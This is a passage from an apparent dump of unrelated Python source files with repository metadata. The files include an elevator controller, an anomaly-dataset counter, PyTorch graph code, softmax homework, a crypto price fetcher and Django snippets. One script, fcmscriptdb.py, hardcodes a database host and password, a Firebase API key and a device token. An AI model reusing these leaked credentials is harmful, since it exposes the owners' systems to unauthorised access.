                requestList.addListToRequestList(pendingRequests.list)
                cprint("Requestlist after merge: ".format(requestList.list), BLUE)
            #######################################################
            else:
                printString += "\n" + 'unknown msg from master'
        # except:
        else:
            # printString += '\nexcept for masterMessage\n with message: {}'.format(receivedMessage)
            printString += "received none"
        elevPanel.updateLightsByRequestList(requestList.list, pendingRequests.list)
        #more requests ahead
        #no orders
        #we're at a floor, we check if we should stop here
        if(elev.getFloorSensorSignal() != -1):
            if(elev.getFloorSensorSignal() != currentFloor):
                current_floor = elev.getFloorSensorSignal()
                elev.setCurrentFloor(current_floor)
                elev.setFloorIndicator(elev.getCurrentFloor())
                """this is where we update and send state"""
                msgBuffer, prevState = sendState(elev, requestList, prevState, msgEncoder, msgBuffer)
                # Stop here if a request matches this floor/direction, or if we
                # are at an endpoint or at the furthest requested floor.
                if requestList.isRequestsatFloor(elev.current_floor):
                    if(requestList.isRequestAtFloorAndDirection(elev.current_floor)) or elev.checkEndPoints() or requestList.furthestRequestThisWay() == elev.getCurrentFloor():
                        msgBuffer = stopAndRemoveRequests(elev, msgBuffer, msgEncoder, requestList)
                        openDoor(floorStopTimer, elev)
                elif requestList.furthestRequestThisWay() == elev.getCurrentFloor() or elev.checkEndPoints():
                    requestList.removeRequestsAtFloor(elev.getCurrentFloor())
                    openDoor(floorStopTimer, elev)
        #printString += "\n*********\nreqList:\n{}\n\n".format(requestList.list)
        printString += "\nlocal list:\n{}\n\n".format(requestList.list)
        # Send one buffered message per pass; ping when the buffer is empty so
        # the master can still detect that we are alive.
        if msgBuffer:
            slave.send(msgBuffer.pop(0))
        else:
            slave.sendPing()
        # Only print when the status text changed, to keep the console usable.
        if printString != prevPrintString:
            print printString
            prevPrintString = printString
        if elev.getStopSignal():
            elev.stop()
            break
        print "direction: {}\tlocal requests: {} pending: {}".format(elev.direction, requestList.list,pendingRequests.list)
        # While the door timer is running, keep the doors open for 1 second
        # before closing; skip motor decisions in the meantime.
        if floorStopTimer.getTimeFlag():
            if floorStopTimer.isTimeOut(1):
                printString += "\n" + "Doors close"
                elev.setDoorLamp(0)
            else:
                time.sleep(0.1)
                continue
        if requestList.requestsAhead():
            elev.setMotorDirection(elev.direction)
        #there are requests, but not ahead
        elif requestList.isRequests():
            elev.reverseElevDirection()
        # elev.setMotorDirection(OUTPUT.MOTOR_STOP)
        # elev.stop()
        # elev.direction = OUTPUT.MOTOR_STOP
        # else:
        #     if(elev.getFloorSensorSignal() != -1):
        #         elev.setMotorDirection(OUTPUT.MOTOR_STOP)
        #         elev.current_floor = elev.getFloorSensorSignal()
        #time.sleep(0.01)
runPythonScript("main.py") | [
"sales@scrapeitout.com"
] | sales@scrapeitout.com |
e61eef63934fe5ca612a7bc8d66138ff90376fc9 | c689b1e632ed1e53dcdaa24a8e4e9c8128fb12f3 | /functions/countPercentage.py | 63c0e2cdda048a2a84de1ed57e4c27a42f359f7f | [] | no_license | ngowilliam1/anom_detection | d7f64a3e37e5db04fdc66765666322a51d0e6fdb | 854bfef4204888b4c50d9d3d0506c20dcb4de506 | refs/heads/master | 2022-07-17T08:52:10.564469 | 2020-05-14T15:27:11 | 2020-05-14T15:27:11 | 263,951,915 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,345 | py | import numpy as np
import pandas as pd
import pickle
# For each anomaly-detection benchmark dataset, load the raw file from
# ../data/, normalise the label column to 'label' with 0 meaning "normal",
# and print the anomaly/normal counts and the anomaly percentage.
datasets = ['credit','kdd','mammography','seismic']
for dataset_name in datasets:
    print(f"Currently DS: {dataset_name}")
    # Each source file uses a different name for its class-label column.
    if dataset_name == 'credit':
        name_of_label_var = "Class"
    elif dataset_name == 'kdd':
        name_of_label_var = "label"
    elif dataset_name == 'mammography' or dataset_name == 'seismic':
        name_of_label_var = "class"
    if dataset_name == 'kdd':
        # KDD Cup '99 ships without a header row, so supply the column names.
        pathOfDS = '../data/kddcup.data.corrected'
        col_names = ["duration", "protocol_type", "service", "flag", "src_bytes", "dst_bytes", "land", "wrong_fragment",
                     "urgent", "hot", "num_failed_logins", "logged_in",
                     "num_compromised", "root_shell", "su_attempted", "num_root", "num_file_creations", "num_shells",
                     "num_access_files", "num_outbound_cmds",
                     "is_host_login", "is_guest_login", "count", "srv_count", "serror_rate", "srv_serror_rate",
                     "rerror_rate", "srv_rerror_rate", "same_srv_rate",
                     "diff_srv_rate", "srv_diff_host_rate", "dst_host_count", "dst_host_srv_count",
                     "dst_host_same_srv_rate", "dst_host_diff_srv_rate",
                     "dst_host_same_src_port_rate", "dst_host_srv_diff_host_rate", "dst_host_serror_rate",
                     "dst_host_srv_serror_rate", "dst_host_rerror_rate",
                     "dst_host_srv_rerror_rate", "label"]
        df = pd.read_csv(pathOfDS, header=None, names=col_names, index_col=False)
    elif dataset_name == 'credit' or dataset_name == 'mammography' or dataset_name == 'seismic' :
        pathOfDS = f'../data/{dataset_name}.csv'
        df = pd.read_csv(pathOfDS, low_memory=False, index_col=False).rename(columns={name_of_label_var: "label"})
    # Changing normal label from -1 to 0
    if dataset_name == 'mammography':
        df['label'] = df['label'].replace(-1,0)
    # The value that marks a normal (non-anomalous) record in each dataset.
    if dataset_name == 'credit' or dataset_name == 'seismic' or dataset_name == 'mammography':
        normal = 0
    elif dataset_name == 'kdd':
        normal = 'normal.'
    labels = df['label'].copy()
    is_anomaly = labels != normal
    # Mean of the boolean mask is the fraction of anomalous records.
    an_mean = is_anomaly.sum() / is_anomaly.count()
    an_sum = is_anomaly.sum()
    print("Initial Anomalies is: ",an_sum)
    print("Initial Normals is: ", (labels == normal).sum())
    print("Initial Count is: ", is_anomaly.count())
    print("Initial Percent Anomaly is: ", an_mean)
"wingo@deloitte.ca"
] | wingo@deloitte.ca |
693a6b56c1dcfa2ea9662fb36b4be998ad33ad48 | b0c391ecf351e2317ac61c257dd6bfa5b10d4015 | /pymotifs/utils/discrepancy.py | ba46d3fcda401c9febc9bcd011eeb1154a72c7ae | [] | no_license | BGSU-RNA/RNA-3D-Hub-core | 57db94bfff9b338b3a751f545699f4117150b921 | 1982e10a56885e56d79aac69365b9ff78c0e3d92 | refs/heads/master | 2023-05-26T09:41:38.397152 | 2023-05-23T05:50:10 | 2023-05-23T05:50:10 | 6,049,336 | 3 | 1 | null | 2022-06-21T21:27:52 | 2012-10-02T18:26:11 | Python | UTF-8 | Python | false | false | 1,617 | py | """This contains some utility functions for dealing with discrepancies.
"""
from pymotifs.constants import MAX_RESOLUTION_DISCREPANCY
from pymotifs.constants import MIN_NT_DISCREPANCY
def should_compare_chain_discrepancy(chain):
"""Check if we can compared discrepancies using this chain.
Parameters
----------
chain : dict
The chain dict to test.
Returns
-------
valid : bool
True if the discrepancy of this chain can be used for comparisions.
"""
return valid_chain(chain)
def should_compute_chain_discrepancy(chain):
"""Check if we should compute the discrepancy using this chain.
Parameters
----------
chain : dict
The chain dict to test.
Returns
-------
valid : bool
True if this chain should have a discrepancy computed using it.
"""
return valid_chain(chain)
def valid_chain(chain):
"""Check if the chain can have a dsicrepancy computed. This means it has
enough nucleotides and it has a good enough resolution, unless it is NMR,
in which case we always allow a discrepancy.
Parameters
----------
chain : dict
The chain dict to test, it should have a 'resolution', 'length' and
'member' entry.
Returns
-------
valid : bool
True if this chain can have a discrepancy computed using it.
"""
if chain['length'] < MIN_NT_DISCREPANCY:
return False
if chain['method'] != 'SOLUTION NMR':
return chain['resolution'] is not None and \
chain['resolution'] <= MAX_RESOLUTION_DISCREPANCY
return True
| [
"blakes.85@gmail.com"
] | blakes.85@gmail.com |
34fd7d5569b9eb07704a2126debed9f16454d87f | bfd4274c3cee5e43f348b24167cc5d294c1a3ae0 | /main.py | 61aa29e83328f3be3728db61002abdb21c2c0ed1 | [] | no_license | GustavoLeao2018/grafos | 43afb51ab67a69af8cd8240d07e9c067b05a2909 | d12af8c5a6cbaff7468cbe96c834fdb0dca03f90 | refs/heads/master | 2020-06-13T15:26:35.527328 | 2019-07-01T14:59:12 | 2019-07-01T14:59:12 | 194,694,489 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 328 | py | from grafo import *
from desenha import *
from random import *
# Build a small graph with 5 randomly placed vertices and draw it.
grafo = Grafo()
desenha = Desenha()
for i in range(1, 6):
    # Random (x, y) position within a 600x600 area centred on the origin.
    coordenada = (randint(-300,300), randint(-300, 300))
    grafo.addVertice(i, coordenada)
# NOTE(review): vertices are numbered 1..5, so this loop can never print
# anything — confirm whether 0 was intended to be a sentinel value.
for item in grafo.vertices:
    if item == 0:
        print(item)
print("*"*10)
desenha.desenha(grafo.vertices)
"181510004@fspoa.br"
] | 181510004@fspoa.br |
fcd5aea4bef58a9882687de20878935c3a53ac39 | 5d26b8eb8b5c8f6ea61f5b5d09d77985dbba154b | /qlearning/Qlearning_python/qlearning/old/generate_bittrex_histo.py | e761636ea3a35ba2e08a2cc4e454e6f15da8b09a | [] | no_license | atthom/ml_misc | 5d89d333c415d256ad9f274251a7fd1fdb1c547c | 5a0dafdd54e70c57edc2fc4b319eca3d512b1a2f | refs/heads/master | 2021-08-14T20:47:15.644590 | 2017-11-16T18:29:58 | 2017-11-16T18:29:58 | 110,398,363 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,160 | py | import urllib.request
import shutil
import os
import logging
from datetime import datetime
from datetime import timezone
# https://bittrex.com/Api/v2.0/pub/market/GetTicks?marketName=BTC-WAVES&tickInterval=thirtyMin&_=1499100220008
DOWLOAD_MARKETS = ["BTC-ETH", "BTC-LTC", "BTC-SC", "BTC-DGB", "BTC-DASH", "BTC-STRAT", "BTC-BTS", "BTC-ETC"]
url = "https://bittrex.com/Api/v2.0/pub/market/GetTicks?marketName="
def fetch_market(market: str) -> None:
    """Download the five-minute candle history for *market* from Bittrex.

    The HTTP response is streamed straight to a local file named
    ``"<market>.history"`` in the current working directory.
    """
    request_url = "{}{}&tickInterval=fiveMin".format(url, market)
    print(request_url)
    # Stream response to disk without loading the whole body into memory.
    with urllib.request.urlopen(request_url) as response, \
            open(market + ".history", 'wb') as out_file:
        shutil.copyfileobj(response, out_file)
def gettimestamp(dd):
    """Convert a 'YYYY-MM-DDTHH:MM:SS' string to a UTC POSIX timestamp.

    The parsed naive datetime is explicitly interpreted as UTC, so the
    result is independent of the local timezone of the machine.
    """
    parsed = datetime.strptime(dd, '%Y-%m-%dT%H:%M:%S')
    return parsed.replace(tzinfo=timezone.utc).timestamp()
if __name__ == "__main__":
for market in DOWLOAD_MARKETS:
fetch_market(market)
dd = "2017-10-21T22:35:00"
dd1 = "2017-10-22T16:45:00"
dd2 = "2017-11-11T16:30:00"
print(gettimestamp(dd1))
print(gettimestamp(dd2))
| [
"thom.jalabert@gmail.com"
] | thom.jalabert@gmail.com |
807ee32c8630c2047e131faea4a067aa048c1f9f | ae4ec15127a34cfd060b2ba9b93f05a074748121 | /projectSubmission/code/toPytorch.py | 585c3d1c41c4513d0011bbae12cb73009fb8306a | [] | no_license | famishedrover/MCMC-NAS | 4f246a81b996515d503fcb6f29a3e9a5b6fb9c1f | a512e4c186c35028c4aa5de7978ac14800d09c86 | refs/heads/master | 2020-09-13T17:25:43.207382 | 2019-11-23T05:24:28 | 2019-11-23T05:24:28 | 222,853,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,230 | py | from graphGeneration import getFullArch, topsort
from graphPlot import plotUndirected, plotDirected
from neuralnet import unit , runNetwork
# extra imports as backup
import torch
import torch.nn as nn
import torch.nn.functional as F
# To convert the graph to pytorch version :
# 1. Get topsort of the graph from networkx
# 2. Assign Layer to the node in the graph according to the node
# e.g. some internal node is a conv layer etc...
# Conv layer inp and out channels differs depending upon the components <- we attached different components to create a full graph
# 3. Create a ModuleList for this new graph copy and write the forward function for pytorch which is essentially
# traverse the topsort sequentially and any element i requires outputs of parent(i) as input
# ------------------WRITE NETWORKX -> PYTORCH NODE CONVERSION SPECIFIC TO PROBELEM STATEMENT---------------------------
# Try for ImageNet
def giveLayerImageNet(G, node):
    """Placeholder for an ImageNet-sized layer assignment (not implemented)."""
    pass
# FOR MNIST <- have seperate giveLayers accroding to image input
# The order is by design is such that all 'a' component come first then 'b' so on
def giveLayer(G, node):
    """Attach a concrete layer (a ``unit``) to *node* of the MNIST graph.

    Channel widths depend on where the node sits in the architecture:
    component 'a' works at 8 channels and widens to 16 just before junction
    'A'; component 'b' works at 32 channels and narrows back to 16 just
    before junction 'B'; the output component stays at 8 channels.  The
    junction nodes 'A' and 'B' additionally max-pool.

    Bug fixed: the original function assigned ``unit(8, 1)`` to node 'Ou'
    at the top and then unconditionally overwrote it with ``unit(8, 8)`` at
    the bottom; the dead first assignment has been removed (the effective
    behavior is unchanged — 'Ou' still ends up with ``unit(8, 8)``).
    """
    if node == 'In':
        # Network input: 1 greyscale channel in, 8 feature channels out.
        G.node[node]['layer'] = unit(1, 8)
    if 'a' in node:
        if node in list(G.successors('In')):
            G.node[node]['layer'] = unit(8, 8)  # start of component
        elif node in list(G.predecessors('A')):
            G.node[node]['layer'] = unit(8, 16)  # end of component
        else:
            G.node[node]['layer'] = unit(8, 8)  # continuation of component
    if node == 'A':
        G.node[node]['layer'] = unit(16, 16, pool=True)
    if 'b' in node:
        if node in list(G.successors('A')):
            G.node[node]['layer'] = unit(16, 32)  # start of component
        elif node in list(G.predecessors('B')):
            G.node[node]['layer'] = unit(32, 16)  # end of component
        else:
            G.node[node]['layer'] = unit(32, 32)  # continuation of component
    if node == 'B':
        G.node[node]['layer'] = unit(16, 8, pool=True)
    if 'ou' in node:
        if node in list(G.successors('B')):
            G.node[node]['layer'] = unit(8, 8)  # start of component
        elif node in list(G.predecessors('Ou')):
            G.node[node]['layer'] = unit(8, 8)  # end of component
        else:
            G.node[node]['layer'] = unit(8, 8)  # continuation of component
    if node == 'Ou':
        # Final node; output tensor will be (batch, 8, H, W).
        G.node[node]['layer'] = unit(8, 8)
# list(G_dir.successors(n))
def attachLayerDependingUponNode(G, order):
    """Assign a neural-network layer to every node of *G*.

    Visits the nodes in the given (topological) *order* and delegates the
    per-node layer choice to ``giveLayer`` (MNIST channel widths).  The
    graph is mutated in place and also returned for convenience.
    """
    # For MNIST
    # giveLayer = giveLayerMNIST
    for graph_node in order:
        giveLayer(G, graph_node)
    return G
# --------------------------------- SAMPLE RUN-------------------------------------------------------------
# G = getFullArch(3, 300)
# plotDirected(G)
# graphOrder = list(topsort(G))
# # The order is by design is such that all 'a' component come first then 'b' so on
# G = attachLayerDependingUponNode(G,graphOrder)
# print G.nodes.data()
# ---------------------------------DYNAMIC NEURAL NETWORK GEN FROM NETWORKX GRAPH-----------------------------
'''
Main NN module which takes in the attachedLayer networkx Graph and creates the ModuleList Pytorch Network
'''
class Net(nn.Module):
    """Dynamic CNN whose dataflow mirrors a networkx DAG.

    Each graph node carries a pre-built layer (attached by
    ``attachLayerDependingUponNode``); the forward pass evaluates nodes in
    topological order, feeding each node the outputs of its predecessors,
    and finishes with a fully connected log-softmax classifier over the
    'Ou' node's output.
    """
    def __init__(self, G):
        """Build a ModuleList from the layers stored on *G*'s nodes."""
        super(Net, self).__init__()
        self.G = G # this is graph with layers attached
        self.graphOrder = list(topsort(G)) #save time in topsorting everytime when required, use this <-DO NOT CHANGE THIS ORDER!!! as nodeInNN is orderdependent
        # nodesInNN[i] is the layer for graphOrder[i]; registration in a
        # ModuleList makes the parameters visible to the optimizer.
        self.nodesInNN = nn.ModuleList()
        for nod in self.graphOrder :
            # print nod
            self.nodesInNN.append(G.node[nod]['layer'])
        self.fc = nn.Linear(8*7*7, 10) # 3 maxpools cause the final image to be 1,8,7,7
    def forward(self, x):
        """Evaluate the graph in topological order and classify the result."""
        # result maps each graph node to its computed output tensor.
        result = {}
        for ix, node in enumerate(self.graphOrder) :
            # print node
            # find pred and get results from pred
            # then add those pred
            # then supply in the curr node
            pred = list(self.G.predecessors(node))
            if len(pred) == 0 : # when node == 'In'
                result[node] = self.nodesInNN[ix](x)
            else :
                # get results for each pred and add
                # tmp = result[pred[0]]
                # for pNode in pred[1:] :
                #     tmp += result[pNode]
                result[node] = self.nodesInNN[ix](*[result[pNode] for pNode in pred])
        x = torch.flatten(result['Ou'],1)
        output = self.fc(x)
        output = F.log_softmax(output, dim=1)
        return output
def testMNIST(Net,G):
    '''
    Smoke-test the generated network on an MNIST-shaped input.

    Builds a Net from graph *G*, feeds a zero tensor of shape
    (1, 1, 28, 28) through it and prints the output shape, verifying that
    all layer dimensions are mutually consistent.
    '''
    x = torch.zeros((1,1,28,28))
    model = Net(G)
    # NOTE(review): Python 2 print statement — this file mixes py2/py3 syntax.
    print model(x).shape
# ---------------------------------RANDOM HIT/MISS CODE-------------------------------------------------------------
# nx.readwrite.nx_yaml.write_yaml(G,"model.yaml")
# runNetwork(model)
# nnModelDict = attachLayerDependingUponNode(G, graphOrder)
# making graphOrder as list rather than the generator object is the only useful thing I could find to do with topsort
# Working with networkx graphs sample <- assiging data to nodes
# print graphOrder
# print graphOrder[0]
# G.nodes[graphOrder[0]]['layer'] = 1
# print G.nodes[graphOrder[0]]['layer']
| [
"mudit.verma2014@gmail.com"
] | mudit.verma2014@gmail.com |
a6143cc944275c501610621c02d363694a678572 | b55ebd8d25e2d063c8b758cb8286f2c5b32f2c6e | /contact/urls.py | b8ca20d3701115a380c4390100b65bd300becc31 | [] | no_license | bellarej/django-job-board | ceaedc37b7d4e9d457485d38410023f4aa2c31b5 | 195bfea5e0170191e17d41ea630b0d6bc90f6c7c | refs/heads/master | 2022-12-20T09:48:17.204571 | 2020-09-17T13:53:43 | 2020-09-17T13:53:43 | 293,544,137 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | from django.urls import path, include
from . import views
app_name='contact'
urlpatterns = [
path('', views.send_message, name = 'contact'),
] | [
"bellarej.tarek@gmail.com"
] | bellarej.tarek@gmail.com |
73c443f1b481cf4018913268a23157a8d463c438 | 6a4958b6748f7e3f9382ce106c0f1ed21d4db698 | /alien_invasion.py | 0eda42ba580ca94d65591ad24c9934b37e4c3a46 | [] | no_license | eharbers/Alien_Invasion | 8aa36879681c8bfdc4134734f8e0f0a4f13fe222 | 440277701af476d84c0ab2910e37fd81a59cb6b2 | refs/heads/master | 2016-08-11T08:31:23.387368 | 2016-01-25T19:43:34 | 2016-01-25T19:43:34 | 49,975,687 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | import pygame
from pygame.sprite import Group
from settings import Settings
from ship import Ship
import game_functions as gf
def run_game():
# Initialize game, settings and screen object.
pygame.init()
ai_settings = Settings()
screen = pygame.display.set_mode(
(ai_settings.screen_width, ai_settings.screen_height))
pygame.display.set_caption("Alien Invasion")
# Make a ship
ship = Ship(ai_settings, screen)
# Make a group to store bullets in.
bullets = Group()
# Start the main loop for the game.
while True:
gf.check_events(ai_settings, screen, ship, bullets)
ship.update()
bullets.update()
gf.update_bullets(bullets)
gf.update_screen(ai_settings, screen, ship, bullets)
run_game()
| [
"erik.harbers64@gmail.com"
] | erik.harbers64@gmail.com |
a55ec19d3abd4ee61e6b58d78eafa94e90652191 | c10049fe227dce368e9f7138b972cd8141caf77b | /booking/booking/wsgi.py | 6c18fdb09869185ba59ffd0a86846e1747b81bc9 | [] | no_license | mathiasflaatt/booking-project | 0e9cb9ce8b09fd9bc4255a9ab93748755f958c36 | 73548dff229343d75d690b9b65455adc1635ef38 | refs/heads/master | 2022-10-31T10:11:22.514883 | 2016-09-19T13:22:27 | 2016-09-19T13:22:27 | 67,606,885 | 0 | 1 | null | 2022-10-20T22:03:09 | 2016-09-07T13:02:11 | Python | UTF-8 | Python | false | false | 391 | py | """
WSGI config for booking project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "booking.settings")
application = get_wsgi_application()
| [
"Mathiasflaatt@gmail.com"
] | Mathiasflaatt@gmail.com |
6425948003272e8b7845b8b2a02bb4d2ab44b0b5 | e9de2e778bebc8c9d9da4826a6372a462831fb62 | /fcmscriptdb.py | 0a17591b4da1fe06e935cdf1ee6939b98d8a75f6 | [] | no_license | rahulgoyal911/FCMScript | 2c698bb41012fce3e015598c5ded7f7de8033114 | 2f8c21823e4849f0c5f1844b58c48ae8b9b9e7f2 | refs/heads/master | 2020-04-21T23:41:18.961515 | 2019-02-10T14:22:55 | 2019-02-10T14:22:55 | 169,954,334 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 967 | py | # Send to single device.
from pyfcm import FCMNotification
import psycopg2
conn = psycopg2.connect(database = "testdb2", user = "postgresql", password = "namespace1", host = "sample-database.czgprnseypbr.us-east-1.rds.amazonaws.com", port = "5432")
print ('Opened database successfully')
cur = conn.cursor()
cur.execute("SELECT name from COMPANY")
rows = cur.fetchall()
for row in rows:
print ("NAME = ", row[0])
name = row[0]
print ("fetched successfully");
push_service = FCMNotification(api_key="AAAALZRFb04:APA91bEjxns-acpzgQwQK93ePXeb0LfQ6oES0dW7PSTuSE00qzsWhmVqFu4M0O-D6XVH1Cb_XC2miS0AitRImEcRjSEzRKKXJAAbOJg876mOwIY04VdOiZgoi0VL5MoTWmcr1RTpN5ht")
registration_id = "dyWTx-v3YtQ:APA91bHVf4yLwu2HpflWNW9yjVX8G3mZmamMgZjqBV-pPMvQCwAydPuQUrRjxz_OZOgrO_IJr5nq2TMLZtI2fgnAu2oDV1dFvu2RC4hmyiFK2WgdZcdQYPATcbMW3Q_tHXU9D9VrEaWz"
message = name
result = push_service.notify_single_device(registration_id=registration_id, message_body=message)
print (result)
| [
"rahulgoyal0.rg@gmail.com"
] | rahulgoyal0.rg@gmail.com |
872a1c04e4e3be70b6fb3ffad70aed3ecf9ae066 | 2bad2905a23258f3bb4150b9e12e6718ed95f2b0 | /demo5/app/models.py | 31b29bc96ceb3265f32837c9466a99a6576f02d2 | [] | no_license | arar456456/django | 7f859232f387301344dbd60cea41528629ef4abb | 58814c587ff0202d57a132f4423de2b70afd792a | refs/heads/master | 2022-11-26T12:29:12.879068 | 2020-08-02T11:02:51 | 2020-08-02T11:04:03 | 284,438,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 228 | py | from django.db import models
from mongoengine import *
# Create your models here.
class Inmassage(Document):
uid = SequenceField()
name = StringField(max_length=30, required=True)
habit = StringField(max_length=30)
| [
"489303532@qq.com"
] | 489303532@qq.com |
2db5c1354b70d24e121f034a8a8dbae8033e8a58 | cbdd47c42a3a0d1fe3a8f3480e9a07fd166ecd8b | /2018/assignment1/cs231n/classifiers/softmax.py | 6a579093f89e2ce113a65d9e63200ca975c42a0a | [] | no_license | RuisongZhou/CS231N_2018 | beb8aa526a4f1744b2473584c4306924b9df7a48 | 9e1bfa1aedc0146ccb3a20c65d312f629ae4bdce | refs/heads/master | 2020-04-13T19:53:06.963490 | 2018-12-28T13:49:32 | 2018-12-28T13:49:32 | 163,414,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,956 | py | import numpy as np
from random import shuffle
def softmax_loss_naive(W, X, y, reg):
"""
Softmax loss function, naive implementation (with loops)
Inputs have dimension D, there are C classes, and we operate on minibatches
of N examples.
Inputs:
- W: A numpy array of shape (D, C) containing weights.
- X: A numpy array of shape (N, D) containing a minibatch of data.
- y: A numpy array of shape (N,) containing training labels; y[i] = c means
that X[i] has label c, where 0 <= c < C.
- reg: (float) regularization strength
Returns a tuple of:
- loss as single float
- gradient with respect to weights W; an array of same shape as W
"""
# Initialize the loss and gradient to zero.
loss = 0.0
dW = np.zeros_like(W)
num_classes = W.shape[1] #10
num_train = X.shape[0]
#############################################################################
# TODO: Compute the softmax loss and its gradient using explicit loops. #
# Store the loss in loss and the gradient in dW. If you are not careful #
# here, it is easy to run into numeric instability. Don't forget the #
# regularization! #
#############################################################################
scores = X.dot(W)
maxLog = np.max(scores, axis =1)
#print("取最大")
#print(maxLog.shape)
maxLog = np.reshape(np.repeat(maxLog, num_classes), scores.shape)
#print("重新转换后")
#print(maxLog)
expScores = np.exp(scores+maxLog)
#print(expScores)
#loss and gradient implement
for i in range(num_train):
# substract maxnium to make the exp standard
esum=sum(expScores[i])
eyi = expScores[i,y[i]]
li = -np.log(eyi / esum)
loss+=li
for j in range(num_classes):
dW[:,j]+=(expScores[i,j]/esum)*X[i]
dW[:,y[i]] -= X[i]
loss /= num_train
loss += 0.5*reg * np.sum(W*W)
dW /= num_train
dW += reg * W
#############################################################################
# END OF YOUR CODE #
#############################################################################
return loss, dW
def softmax_loss_vectorized(W, X, y, reg):
"""
Softmax loss function, vectorized version.
Inputs and outputs are the same as softmax_loss_naive.
"""
# Initialize the loss and gradient to zero.
loss = 0.0
dW = np.zeros_like(W)
num_classes = W.shape[1] #10
num_train = X.shape[0]
#############################################################################
# TODO: Compute the softmax loss and its gradient using no explicit loops. #
# Store the loss in loss and the gradient in dW. If you are not careful #
# here, it is easy to run into numeric instability. Don't forget the #
# regularization! #
#############################################################################
scores=X.dot(W)
maxLogC = np.max(scores,axis=1)
maxLogC=np.reshape(np.repeat(maxLogC,num_classes),scores.shape )
expScores=np.exp(scores+maxLogC)
exp_correct_class_score = expScores[np.arange(num_train), y]
##计算loss
loss=-np.log(exp_correct_class_score/np.sum(expScores,axis=1))
loss=sum(loss)/num_train
loss+=0.5*reg*np.sum(W*W)
##计算gradient
expScoresSumRow=np.reshape(np.repeat(np.sum(expScores,axis=1),num_classes),expScores.shape )
#expScoresSumRow.shape 为(500,10)
graidentMatrix=expScores/ expScoresSumRow
#对于yi要-1,就是loss的偏导数
graidentMatrix[np.arange(num_train),y]-=1
dW = X.T.dot(graidentMatrix)
dW/=num_train
dW+=reg*W
#############################################################################
# END OF YOUR CODE #
#############################################################################
return loss, dW
| [
"811437508@qq,com"
] | 811437508@qq,com |
ceadd39f58e3cdd2956e37c2b347fd9cdd1e0a75 | cdc91518212d84f3f9a8cd3516a9a7d6a1ef8268 | /python/eve_number_sum.py | 02fbfe2554068c956fce71f67dc342dbab849094 | [] | no_license | paulfranco/code | 1a1a316fdbe697107396b98f4dfe8250b74b3d25 | 10a5b60c44934d5d2788d9898f46886b99bd32eb | refs/heads/master | 2021-09-20T14:00:35.213810 | 2018-08-10T06:38:40 | 2018-08-10T06:38:40 | 112,060,914 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | # write a function that adds all of of the even numbers from 0 - 26
def my_func():
my_sum = 0
for x in range(0, 25):
if x % 2 == 0:
my_sum = my_sum + x
print(my_sum)
my_func() | [
"paulfranco@me.com"
] | paulfranco@me.com |
f79071c1101882953d6653f2c695c93cb32e2ba8 | 40e8e2e7a31357ecc2c5b53c4b32c9642b9dac4e | /gui/lekar/zahtev_za_pregled_lop.py | c8176fbd3984e59081878828bba19ab13dd5ffbe | [] | no_license | Raffayet/HospitalApplication | ef7c6f9dddd3826d47500bf92839d3d47305b37e | a119537b33407f7f1b50446f87ebbc27e67ade8b | refs/heads/master | 2023-08-24T00:09:05.636769 | 2021-10-09T12:08:46 | 2021-10-09T12:08:46 | 415,380,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,642 | py | from model.dto.dogadjaji_dto.zakazivanje_pregleda_kod_spec_dto import ZakazivanjePregledaKodSpecijalisteDTO
from servis.kalendar.kalendar_servis import KalendarServis
from servis.korisnik.korisnik_servis import KorisnikServis
from model.enum.tip_lekara import TipLekara
from tkinter import ttk, messagebox
from tkinter import *
import datetime
class ZahtevZaPregledKodSpecijaliste:
def __init__(self, root, pacijent):
self._root = root
self._root.title('Zakazivanje pregleda za ' + pacijent)
self._pacijent = pacijent
self._specijalista = StringVar(self._root)
self._lista_specijalista = KorisnikServis().vrati_lekare_specijaliste_ili_lop(TipLekara.SPECIJALISTA)
self._specijalista.set(self._lista_specijalista[0])
self._pocetni_datum = ttk.Entry(self._root)
self._krajnji_datum = ttk.Entry(self._root)
self._vreme_pocetka = ttk.Entry(self._root)
self._vreme_zavrsetka = ttk.Entry(self._root)
self.izaberi_pocetni_krajnji_datum()
self.izaberi_specijalistu()
ttk.Button(self._root, text="Potvrdi", command=self.provera_unosa).grid(row=5, column=1, sticky=E, padx=10,
pady=20)
def izaberi_pocetni_krajnji_datum(self):
Label(self._root, text='Pregled treba da se odrzi\nu sledecem vremenskom periodu:', font='Console 11').grid(
row=0, column=0, sticky=W, pady=10, padx=10)
Label(self._root, text='OD (dd/mm/gggg): ').grid(row=1, column=0, sticky=E, pady=5)
self._pocetni_datum.grid(row=1, column=1, sticky=W)
Label(self._root, text='DO (dd/mm/gggg): ').grid(row=2, column=0, sticky=E)
self._krajnji_datum.grid(row=2, column=1, sticky=W)
def izaberi_specijalistu(self):
Label(self._root, justify=LEFT, text="Specijalista:", font="Console 11").grid(row=3, sticky=W, column=0,
pady=10, padx=10)
default = self._specijalista.get()
specijalista_OptionMenu = ttk.OptionMenu(self._root, self._specijalista, default, *self._lista_specijalista)
specijalista_OptionMenu.grid(row=3, column=1, pady=10)
def provera_unosa(self):
if not self.provera_datuma():
messagebox.showerror("GRESKA", "Los format datuma! (DD/MM/GGGG")
else:
self.salji_notifikaciju_sekretaru()
def provera_datuma(self):
try:
d, m, g = self._pocetni_datum.get().split("/")
self._datum_pocetka = datetime.date(int(g), int(m), int(d))
d, m, g = self._krajnji_datum.get().split("/")
self._datum_zavrsetka = datetime.date(int(g), int(m), int(d))
if self._datum_pocetka < datetime.date.today() or self._datum_zavrsetka < self._datum_pocetka:
return False
except ValueError:
return False
return True
def salji_notifikaciju_sekretaru(self):
zakazivanjeDTO = ZakazivanjePregledaKodSpecijalisteDTO(self._datum_pocetka, self._datum_zavrsetka,
